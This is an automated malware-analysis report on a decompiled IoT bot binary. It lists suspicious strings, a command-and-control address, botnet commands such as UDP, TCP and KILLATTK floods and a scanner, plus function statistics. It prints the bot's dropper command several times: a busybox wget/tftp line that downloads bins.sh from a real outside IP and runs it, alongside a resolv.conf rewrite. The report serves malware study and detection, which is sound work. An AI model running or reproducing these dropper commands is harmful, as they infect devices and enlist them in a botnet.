=============================================================================
========	BINARY ID :d8f6338ce10a8e727a29e0876c62ee292a500a6f==================================================
================================================================================
================================================================================
========	STRINGS SUMMARY : =====================================================
================================================================================
TOTAL STRINGS COUNT :464
SUPSCPECTED LINES COUNT :42
SUPSCPECTED STRINGS COUNT (DISTINCT) :17
SUPSCPECTED STRINGS WEIGHT :62
SUSPECT STRING SCORE : [62 / 150] 41%
USER AGENTS STRINGS COUNT :0
STATIC IPs STRINGS COUNT :2
DYNAMIC IPs STRINGS COUNT :1
================================================================================
========	STRINGS DETAILS : =====================================================
================================================================================
================================================================================
========	SUSPECTED STRINGS : =====================================================
================================================================================
busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n
/bin/sh
/proc/cpuinfo
PING
Invalid flag "%s"
GETLOCALIP
KILLATTK
/proc/net/route
%sWelcome to the botnet [%s:%s:%d cores] :)%s
%sCould not connect to commServer!%s\n
SCANNER
SCANNER ON | OFF
SCANNER STOPPED!
attempting to start scanner
SCANNER STARTED!
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
;<=>?@ABCDEFGJIMOPQRSTUVWX[\\^_`abcxyz{|}~
No such process
Interrupted system call
No child processes
Too many open files in system
Read-only file system
Level 2 not synchronized
Machine is not on the network
Name not unique on network
Interrupted system call should be restarted
Socket operation on non-socket
Protocol wrong type for socket
Socket type not supported
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
Transport endpoint is already connected
Transport endpoint is not connected
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
================================================================================
========	USER AGENTS STRINGS : =====================================================
================================================================================
================================================================================
========	STATIC IP ADRESSES : =====================================================
================================================================================
185.158.113.30:7
8.8.8.8
================================================================================
========	DYNAMIC IP MASKS : =====================================================
================================================================================
%d.%d.%d.%d
================================================================================
========	/proc FOLDER ACCESS : =====================================================
================================================================================
/proc/cpuinfo
/proc/net/route
================================================================================
========	HISTORY TEMPERING : =====================================================
================================================================================
================================================================================
========	AUTOINSTALL COMMANDS : =====================================================
================================================================================
================================================================================
========	FUNCTIONS SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES			: 87513
+++TOTAL FUNCTIONS 			:202
+++LINES PER FUNCTION RATIO 	: 433.232673267327
+++SUSPECTED LINES COUNT 	: 200
+++SUSPECTED LINES RATIO 	: 0.22853747443237
================================================================================
========	WHILES SUMMARY : =====================================================
================================================================================
+++TOTAL FILE LINES				: 87513
+++WHILE (TRUE) LINES			: 13140
+++WHILE (TRUE) LINES RATION		:15.0149120702067%
+++WHILE (TRUE) LOOPS COUNT		: 73
================================================================================
========	SYSTEM FILES SUMMARY : ================================================
================================================================================
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
        "cd /var/ || cd /tmp/ || cd /var/run( || cd /var/tmp/ || cd /dev/ || cd /mnt/\r\n",
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
    char (*v64)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";
    char (*v65)[61] = "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n";
            function_40fa10((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
        function_40fa10((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
        function_40fa10((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
    function_40fa10((int32_t)"/bin/sh", (int32_t)"sh", (int32_t)"-c", a1, 0);
    int32_t v329 = function_40b980("/proc/cpuinfo", 0); // 0x402430
    int32_t v329 = function_40b980("/proc/cpuinfo", 0); // 0x402734
    int32_t v333 = function_40b980("/proc/net/route", 0); // 0x409fb8
    int32_t v329 = function_40b980("/dev/null", a2); // 0x40fff4
================================================================================
========	IP PATTERNS SUMMARY : =================================================
================================================================================
    char (*v60)[17] = "185.158.113.30:7";

        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"

        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"

        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"

    char (*v64)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";

    char (*v65)[61] = "busybox echo || echo nameserver 8.8.8.8 > /etc/resolv.conf\r\n";

        function_401514(v341, (int32_t)"%d.%d.%d.%d", v330, v334, v337, v339 % 256);

    function_40e300((int32_t)"8.8.8.8");

================================================================================
========	SYSTEM CALLS SUMMARY : ================================================
================================================================================
================================================================================
========	FUNCTIONS LIST : =======================================================
================================================================================
FUNCTION_NAME                                     |ARGS|LENGH   |SUSPCET_INSTRC|WHILE_INSTRC|
----------------------------------------------------------------------------------------------
function_40c3e4                                   |3   |8870    |33            |8469        |
----------------------------------------------------------------------------------------------
function_40a1b0                                   |2   |766     |12            |331         |
----------------------------------------------------------------------------------------------
function_4111a0                                   |5   |1352    |11            |929         |
----------------------------------------------------------------------------------------------
function_4088a0                                   |2   |750     |10            |94          |
----------------------------------------------------------------------------------------------
function_40cf6c                                   |1   |1159    |6             |813         |
----------------------------------------------------------------------------------------------
function_402940                                   |3   |428     |5             |71          |
----------------------------------------------------------------------------------------------
function_410f60                                   |3   |374     |4             |0           |
----------------------------------------------------------------------------------------------
function_4080dc                                   |3   |481     |4             |127         |
----------------------------------------------------------------------------------------------
function_4079a8                                   |3   |488     |4             |133         |
----------------------------------------------------------------------------------------------
function_409e30                                   |0   |386     |4             |21          |
----------------------------------------------------------------------------------------------
function_4023f4                                   |1   |420     |4             |48          |
----------------------------------------------------------------------------------------------
function_4000cc                                   |0   |369     |4             |0           |
----------------------------------------------------------------------------------------------
function_40dd30                                   |2   |427     |3             |92          |
----------------------------------------------------------------------------------------------
function_401bd0                                   |1   |421     |3             |46          |
----------------------------------------------------------------------------------------------
function_4045fc                                   |1   |687     |3             |326         |
----------------------------------------------------------------------------------------------
function_411b50                                   |3   |423     |3             |89          |
----------------------------------------------------------------------------------------------
function_40de30                                   |2   |457     |3             |108         |
----------------------------------------------------------------------------------------------
function_4119f4                                   |1   |426     |3             |79          |
----------------------------------------------------------------------------------------------
function_40704c                                   |7   |454     |3             |41          |
----------------------------------------------------------------------------------------------
function_40e650                                   |3   |342     |2             |0           |
----------------------------------------------------------------------------------------------
function_411d34                                   |2   |380     |2             |42          |
----------------------------------------------------------------------------------------------
function_40cb90                                   |1   |403     |2             |40          |
----------------------------------------------------------------------------------------------
function_4034d0                                   |1   |389     |2             |55          |
----------------------------------------------------------------------------------------------
function_40bfd8                                   |0   |375     |2             |35          |
----------------------------------------------------------------------------------------------
function_40e490                                   |5   |341     |2             |0           |
----------------------------------------------------------------------------------------------
function_40dbb0                                   |0   |395     |2             |25          |
----------------------------------------------------------------------------------------------
function_40e550                                   |5   |341     |2             |0           |
----------------------------------------------------------------------------------------------
function_400ccc                                   |7   |421     |2             |28          |
----------------------------------------------------------------------------------------------
function_411040                                   |3   |435     |2             |44          |
----------------------------------------------------------------------------------------------
function_412464                                   |1   |398     |2             |27          |
----------------------------------------------------------------------------------------------
function_40f6b0                                   |2   |1117    |2             |0           |
----------------------------------------------------------------------------------------------
function_411d70                                   |2   |420     |2             |74          |
----------------------------------------------------------------------------------------------
function_40da54                                   |1   |424     |2             |33          |
----------------------------------------------------------------------------------------------
function_40e4f0                                   |4   |341     |2             |0           |
----------------------------------------------------------------------------------------------
function_40df80                                   |0   |408     |2             |77          |
----------------------------------------------------------------------------------------------
function_410ff0                                   |4   |353     |2             |0           |
----------------------------------------------------------------------------------------------
function_40dc70                                   |3   |419     |2             |28          |
----------------------------------------------------------------------------------------------
function_400f64                                   |3   |529     |2             |183         |
----------------------------------------------------------------------------------------------
function_4036e8                                   |4   |428     |2             |92          |
----------------------------------------------------------------------------------------------
function_402ce0                                   |4   |381     |2             |19          |
----------------------------------------------------------------------------------------------
function_40d880                                   |0   |590     |1             |91          |
----------------------------------------------------------------------------------------------
function_40301c                                   |0   |358     |1             |10          |
----------------------------------------------------------------------------------------------
function_4106e0                                   |0   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_40b920                                   |2   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_40f3cc                                   |2   |383     |1             |33          |
----------------------------------------------------------------------------------------------
function_40e240                                   |1   |351     |1             |18          |
----------------------------------------------------------------------------------------------
function_40c280                                   |3   |354     |1             |16          |
----------------------------------------------------------------------------------------------
function_403a4c                                   |1   |432     |1             |18          |
----------------------------------------------------------------------------------------------
function_40e410                                   |5   |341     |1             |0           |
----------------------------------------------------------------------------------------------
function_40bb60                                   |4   |356     |1             |0           |
----------------------------------------------------------------------------------------------
function_40e5d0                                   |5   |341     |1             |0           |
----------------------------------------------------------------------------------------------
function_4026f8                                   |0   |346     |1             |0           |
----------------------------------------------------------------------------------------------
function_40e350                                   |4   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_40080c                                   |1   |361     |1             |22          |
----------------------------------------------------------------------------------------------
function_40cce0                                   |0   |458     |1             |71          |
----------------------------------------------------------------------------------------------
function_401e4c                                   |3   |358     |1             |22          |
----------------------------------------------------------------------------------------------
function_40b680                                   |1   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_400a90                                   |4   |437     |1             |13          |
----------------------------------------------------------------------------------------------
function_410920                                   |5   |341     |1             |0           |
----------------------------------------------------------------------------------------------
function_401f70                                   |1   |352     |1             |17          |
----------------------------------------------------------------------------------------------
function_40b740                                   |0   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_40db50                                   |2   |353     |1             |18          |
----------------------------------------------------------------------------------------------
function_40b980                                   |2   |347     |1             |0           |
----------------------------------------------------------------------------------------------
function_40b7f0                                   |0   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_4105c0                                   |3   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_4100b8                                   |7   |669     |1             |18          |
----------------------------------------------------------------------------------------------
function_410740                                   |0   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_40e3b0                                   |4   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_40ec70                                   |2   |382     |1             |38          |
----------------------------------------------------------------------------------------------
function_412534                                   |1   |379     |1             |44          |
----------------------------------------------------------------------------------------------
function_410b20                                   |2   |406     |1             |26          |
----------------------------------------------------------------------------------------------
function_410680                                   |0   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_4107d0                                   |0   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_40cf00                                   |1   |352     |1             |15          |
----------------------------------------------------------------------------------------------
function_40b850                                   |3   |342     |1             |0           |
----------------------------------------------------------------------------------------------
function_410a30                                   |0   |434     |1             |31          |
----------------------------------------------------------------------------------------------
function_4123f0                                   |3   |338     |0             |0           |
----------------------------------------------------------------------------------------------
function_402350                                   |1   |343     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b7a0                                   |0   |337     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f31c                                   |0   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_40d9c0                                   |3   |462     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bc00                                   |1   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b4d0                                   |2   |348     |0             |0           |
----------------------------------------------------------------------------------------------
function_401604                                   |2   |337     |0             |0           |
----------------------------------------------------------------------------------------------
unknown_0                                         |0   |0       |0             |0           |
----------------------------------------------------------------------------------------------
function_410890                                   |1   |382     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ffa4                                   |2   |345     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bfb8                                   |0   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40457c                                   |1   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e8f0                                   |1   |415     |0             |0           |
----------------------------------------------------------------------------------------------
function_4125d0                                   |3   |335     |0             |0           |
----------------------------------------------------------------------------------------------
function_4009d8                                   |2   |336     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e760                                   |2   |414     |0             |0           |
----------------------------------------------------------------------------------------------
function_400160                                   |0   |371     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ba20                                   |3   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_404068                                   |1   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_412050                                   |1   |338     |0             |0           |
----------------------------------------------------------------------------------------------
function_402020                                   |2   |489     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e230                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_410470                                   |3   |348     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e8b4                                   |2   |333     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e130                                   |1   |333     |0             |0           |
----------------------------------------------------------------------------------------------
function_40df30                                   |3   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ed30                                   |4   |343     |0             |0           |
----------------------------------------------------------------------------------------------
function_4022b0                                   |2   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_402834                                   |2   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f134                                   |1   |336     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bd70                                   |0   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e170                                   |1   |343     |0             |0           |
----------------------------------------------------------------------------------------------
function_40da50                                   |2   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40cc70                                   |1   |339     |0             |0           |
----------------------------------------------------------------------------------------------
function_4126f0                                   |0   |334     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e720                                   |1   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40efb4                                   |1   |337     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e6b0                                   |2   |344     |0             |0           |
----------------------------------------------------------------------------------------------
function_40175c                                   |2   |552     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ff9c                                   |2   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40c300                                   |4   |385     |0             |0           |
----------------------------------------------------------------------------------------------
function_400368                                   |0   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_4042e0                                   |2   |337     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ed5c                                   |3   |338     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e220                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_4067c0                                   |6   |524     |0             |0           |
----------------------------------------------------------------------------------------------
function_40db4c                                   |0   |332     |0             |0           |
----------------------------------------------------------------------------------------------
entry_point                                       |1   |334     |0             |0           |
----------------------------------------------------------------------------------------------
function_40d6e0                                   |2   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f1e0                                   |2   |363     |0             |0           |
----------------------------------------------------------------------------------------------
function_410c40                                   |3   |422     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bd30                                   |1   |341     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b6e0                                   |2   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b620                                   |1   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_4003b8                                   |0   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e300                                   |1   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_40d760                                   |4   |404     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f690                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_412680                                   |0   |347     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bd00                                   |1   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_412580                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40021c                                   |0   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f540                                   |4   |368     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e860                                   |2   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_4120c0                                   |2   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bea0                                   |3   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40158c                                   |3   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_411b00                                   |4   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_41002c                                   |0   |352     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ba80                                   |5   |341     |0             |0           |
----------------------------------------------------------------------------------------------
function_411c60                                   |1   |353     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fae0                                   |1   |416     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b490                                   |1   |341     |0             |0           |
----------------------------------------------------------------------------------------------
function_410830                                   |3   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_410420                                   |1   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bd90                                   |1   |357     |0             |0           |
----------------------------------------------------------------------------------------------
function_4122a0                                   |2   |806     |0             |0           |
----------------------------------------------------------------------------------------------
function_4109f0                                   |2   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b8b0                                   |3   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bb00                                   |1   |341     |0             |0           |
----------------------------------------------------------------------------------------------
function_411d30                                   |0   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bc80                                   |3   |333     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e888                                   |0   |336     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bc60                                   |0   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_409be0                                   |0   |367     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e2dc                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b560                                   |2   |341     |0             |0           |
----------------------------------------------------------------------------------------------
function_40db80                                   |2   |344     |0             |0           |
----------------------------------------------------------------------------------------------
function_403298                                   |3   |371     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ed78                                   |3   |446     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bca0                                   |2   |344     |0             |0           |
----------------------------------------------------------------------------------------------
function_412460                                   |2   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b9fc                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_401514                                   |6   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_410980                                   |3   |343     |0             |0           |
----------------------------------------------------------------------------------------------
function_411e70                                   |0   |509     |0             |0           |
----------------------------------------------------------------------------------------------
function_4107a0                                   |1   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_4119f0                                   |3   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f920                                   |1   |351     |0             |0           |
----------------------------------------------------------------------------------------------
function_410620                                   |4   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_412020                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_412110                                   |2   |459     |0             |0           |
----------------------------------------------------------------------------------------------
function_412530                                   |1   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_410560                                   |3   |344     |0             |0           |
----------------------------------------------------------------------------------------------
function_40f064                                   |3   |337     |0             |0           |
----------------------------------------------------------------------------------------------
function_40b5d0                                   |1   |332     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fd20                                   |3   |346     |0             |0           |
----------------------------------------------------------------------------------------------
function_400638                                   |0   |354     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fa10                                   |5   |360     |0             |0           |
----------------------------------------------------------------------------------------------
function_40050c                                   |1   |333     |0             |0           |
----------------------------------------------------------------------------------------------
function_40eae0                                   |1   |401     |0             |0           |
----------------------------------------------------------------------------------------------
function_404444                                   |4   |333     |0             |0           |
----------------------------------------------------------------------------------------------
function_40c170                                   |3   |368     |0             |0           |
----------------------------------------------------------------------------------------------
function_40fed0                                   |0   |360     |0             |0           |
----------------------------------------------------------------------------------------------
function_410e20                                   |2   |426     |0             |0           |
----------------------------------------------------------------------------------------------
function_40c100                                   |1   |342     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e238                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_404114                                   |2   |374     |0             |0           |
----------------------------------------------------------------------------------------------
function_400330                                   |0   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40eef0                                   |0   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ef10                                   |0   |335     |0             |0           |
----------------------------------------------------------------------------------------------
function_40d560                                   |2   |545     |0             |0           |
----------------------------------------------------------------------------------------------
function_40bf00                                   |0   |336     |0             |0           |
----------------------------------------------------------------------------------------------
function_40ff94                                   |1   |331     |0             |0           |
----------------------------------------------------------------------------------------------
function_40e110                                   |2   |331     |0             |0           |
----------------------------------------------------------------------------------------------
================================================================================
========	FUNCTIONS SUSPECTED INSTRUNCTIONS : ===================================
================================================================================
=================FUNCTION : function_40c3e4 ===================
++++++++ FUNCTION START 32098
++++++++ FUNCTION END 40968
++++++++ FUNCTION LENGTH 8870
        while (true) {
                case 37: {
                        while (true) {
                                                        while (true) {
                                                    while (true) {
                                                        while (true) {
                                                    while (true) {
                                                        while (true) {
                                                    while (true) {
                                                        while (true) {
                                                    while (true) {
                                                        while (true) {
                                                    while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                                                                while (true) {
                                                                            while (true) {
                                                                        while (true) {
                                                                    while (true) {
                                                                while (true) {
                                                            while (true) {
                                                                while (true) {
                                                            while (true) {
                                                                    while (true) {
                case 0: {
                            while (true) {
    while (true) {
            case 37: {
                        while (true) {
            case 0: {
                        while (true) {
=================FUNCTION : function_40a1b0 ===================
++++++++ FUNCTION START 19198
++++++++ FUNCTION END 19964
++++++++ FUNCTION LENGTH 766
    function_40bea0((int32_t)"%sWelcome to the botnet [%s:%s:%d cores] :)%s", (int32_t)&v328, v327);
            function_40bea0((int32_t)"%sCould not connect to commServer!%s\n", (int32_t)&v328, (int32_t)&v330);
        while (true) {
            while (true) {
                    while (true) {
                        while (true) {
                                while (true) {
                        while (true) {
                                    while (true) {
        function_40bea0((int32_t)"%sCould not connect to commServer!%s\n", (int32_t)&v328, (int32_t)&v330);
    while (true) {
    while (true) {
=================FUNCTION : function_4111a0 ===================
++++++++ FUNCTION START 77146
++++++++ FUNCTION END 78498
++++++++ FUNCTION LENGTH 1352
    while (true) {
    while (true) {
        while (true) {
                    while (true) {
                        while (true) {
                                            while (true) {
                                                while (true) {
                                        while (true) {
                                while (true) {
                                        while (true) {
                            while (true) {
=================FUNCTION : function_4088a0 ===================
++++++++ FUNCTION START 17686
++++++++ FUNCTION END 18436
++++++++ FUNCTION LENGTH 750
    if (function_40db50(*a2, (int32_t)"PING") == 0) {
    if (function_40db50(*a2, (int32_t)"GETLOCALIP") == 0) {
                while (true) {
                    while (true) {
    if (function_40db50(*a2, (int32_t)"UDP") == 0) {
                                        while (true) {
    if (function_40db50(*a2, (int32_t)"TCP") == 0) {
                                while (true) {
        if (function_40db50(*a2, (int32_t)"KILLATTK") == 0) {
            while (true) {
=================FUNCTION : function_40cf6c ===================
++++++++ FUNCTION START 42535
++++++++ FUNCTION END 43694
++++++++ FUNCTION LENGTH 1159
    while (true) {
            while (true) {
                while (true) {
                                while (true) {
                                        while (true) {
                                        while (true) {
=================FUNCTION : function_402940 ===================
++++++++ FUNCTION START 10506
++++++++ FUNCTION END 10934
++++++++ FUNCTION LENGTH 428
        while (true) {
            function_401604(v338, (int32_t)"PING");
            while (true) {
            while (true) {
    while (true) {
=================FUNCTION : function_410f60 ===================
++++++++ FUNCTION START 75975
++++++++ FUNCTION END 76349
++++++++ FUNCTION LENGTH 374
                case 256: {
                case 512: {
                case 256: {
                case 512: {
=================FUNCTION : function_4080dc ===================
++++++++ FUNCTION START 17202
++++++++ FUNCTION END 17683
++++++++ FUNCTION LENGTH 481
    while (true) {
        while (true) {
                    while (true) {
                    if (function_40e350(*v358, (struct sockaddr *)&v332, 16) == -1) {
=================FUNCTION : function_4079a8 ===================
++++++++ FUNCTION START 16711
++++++++ FUNCTION END 17199
++++++++ FUNCTION LENGTH 488
    while (true) {
        while (true) {
                while (true) {
                    if (function_40e350(*v358, (struct sockaddr *)&v332, 16) == -1) {
=================FUNCTION : function_409e30 ===================
++++++++ FUNCTION START 18809
++++++++ FUNCTION END 19195
++++++++ FUNCTION LENGTH 386
    function_40e350(v329, (struct sockaddr *)&v330, 16);
    function_40e3b0(v329, (struct sockaddr *)&v332, (int32_t)&v331);
    int32_t v333 = function_40b980("/proc/net/route", 0); // 0x409fb8
    while (true) {
=================FUNCTION : function_4023f4 ===================
++++++++ FUNCTION START 9389
++++++++ FUNCTION END 9809
++++++++ FUNCTION LENGTH 420
    int32_t v329 = function_40b980("/proc/cpuinfo", 0); // 0x402430
    while (true) {
            while (true) {
    while (true) {
=================FUNCTION : function_4000cc ===================
++++++++ FUNCTION START 285
++++++++ FUNCTION END 654
++++++++ FUNCTION LENGTH 369
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
        "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n"
    char (*v64)[125] = "busybox wget || wget 185.158.113.30/bins.sh; busybox tftp || tftp -g -r 185.158.113.30 bins.sh; sh bins.sh || bash bins.sh\r\n";
=================FUNCTION : function_40dd30 ===================
++++++++ FUNCTION START 48665
++++++++ FUNCTION END 49092
++++++++ FUNCTION LENGTH 427
    while (true) {
        while (true) {
        while (true) {
=================FUNCTION : function_401bd0 ===================
++++++++ FUNCTION START 7076
++++++++ FUNCTION END 7497
++++++++ FUNCTION LENGTH 421
            while (true) {
        while (true) {
    while (true) {
=================FUNCTION : function_4045fc ===================
++++++++ FUNCTION START 15037
++++++++ FUNCTION END 15724
++++++++ FUNCTION LENGTH 687
    while (true) {
                if (function_40e350(*v348, (struct sockaddr *)&v330, 16) == -1) {
                while (true) {
=================FUNCTION : function_411b50 ===================
++++++++ FUNCTION START 79600
++++++++ FUNCTION END 80023
++++++++ FUNCTION LENGTH 423
    while (true) {
        while (true) {
        while (true) {
=================FUNCTION : function_40de30 ===================
++++++++ FUNCTION START 49095
++++++++ FUNCTION END 49552
++++++++ FUNCTION LENGTH 457
    while (true) {
    while (true) {
        while (true) {
=================FUNCTION : function_4119f4 ===================
++++++++ FUNCTION START 78836
++++++++ FUNCTION END 79262
++++++++ FUNCTION LENGTH 426
    while (true) {
    while (true) {
    while (true) {
=================FUNCTION : function_40704c ===================
++++++++ FUNCTION START 16254
++++++++ FUNCTION END 16708
++++++++ FUNCTION LENGTH 454
    while (true) {
        if (function_40db50(v343, (int32_t)"rst") == 0) {
        if (function_40db50(v343, (int32_t)"psh") == 0) {
=================FUNCTION : function_40e650 ===================
++++++++ FUNCTION START 55762
++++++++ FUNCTION END 56104
++++++++ FUNCTION LENGTH 342
    int32_t sock_fd = socket(domain, type, protocol); // 0x40e670
        result = sock_fd;
=================FUNCTION : function_411d34 ===================
++++++++ FUNCTION START 80717
++++++++ FUNCTION END 81097
++++++++ FUNCTION LENGTH 380
    while (true) {
        while (true) {
=================FUNCTION : function_40cb90 ===================
++++++++ FUNCTION START 40971
++++++++ FUNCTION END 41374
++++++++ FUNCTION LENGTH 403
        while (true) {
    while (true) {
=================FUNCTION : function_4034d0 ===================
++++++++ FUNCTION START 12056
++++++++ FUNCTION END 12445
++++++++ FUNCTION LENGTH 389
    while (true) {
        while (true) {
=================FUNCTION : function_40bfd8 ===================
++++++++ FUNCTION START 30259
++++++++ FUNCTION END 30634
++++++++ FUNCTION LENGTH 375
    while (true) {
    while (true) {
=================FUNCTION : function_40e490 ===================
++++++++ FUNCTION START 54386
++++++++ FUNCTION END 54727
++++++++ FUNCTION LENGTH 341
    int32_t v329 = recv(sock, buf, length, flags); // 0x40e4b0
    if (flags != 0) {
=================FUNCTION : function_40dbb0 ===================
++++++++ FUNCTION START 47845
++++++++ FUNCTION END 48240
++++++++ FUNCTION LENGTH 395
    while (true) {
    while (true) {
=================FUNCTION : function_40e550 ===================
++++++++ FUNCTION START 55074
++++++++ FUNCTION END 55415
++++++++ FUNCTION LENGTH 341
    int32_t v329 = sendto(sock, message, length, flags, NULL, 0); // 0x40e590
    if (flags != 0) {
=================FUNCTION : function_400ccc ===================
++++++++ FUNCTION START 4555
++++++++ FUNCTION END 4976
++++++++ FUNCTION LENGTH 421
            while (true) {
    while (true) {
=================FUNCTION : function_411040 ===================
++++++++ FUNCTION START 76708
++++++++ FUNCTION END 77143
++++++++ FUNCTION LENGTH 435
        while (true) {
    while (true) {
